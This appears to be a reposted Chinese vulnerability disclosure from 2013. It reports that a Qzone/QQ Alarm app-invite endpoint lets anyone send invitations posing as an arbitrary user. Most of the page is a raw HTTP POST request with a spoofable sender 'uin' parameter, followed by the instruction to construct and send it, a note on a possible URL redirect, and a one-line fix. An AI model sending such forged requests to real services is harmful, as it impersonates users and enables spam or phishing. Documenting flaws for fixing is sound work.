当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

QQ闹钟可伪造成任意用户发送邀请消息

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:



POST /cgi-bin/qzapps/appinvite_invite.cgi?g_tk=1023854850 HTTP/1.1
Host: appsupport.qq.com
Proxy-Connection: keep-alive
Referer:
Content-Length: 34
Cache-Control: max-age=0
Origin:
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: uin=信息泄漏防火墙智能屏蔽.; skey=信息泄漏防火墙智能屏蔽.
 
appid=904&uin=10001&fuins=28266866
 
 
构造如上包文发送就是了.
QQ空间的新应用.貌似链接地址里的参数都可以自定义,可能存在url跳转.没有深入.


修复方案:验证下

作者:only_guest ,涛涛电脑知识网,涛涛电脑知识网

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1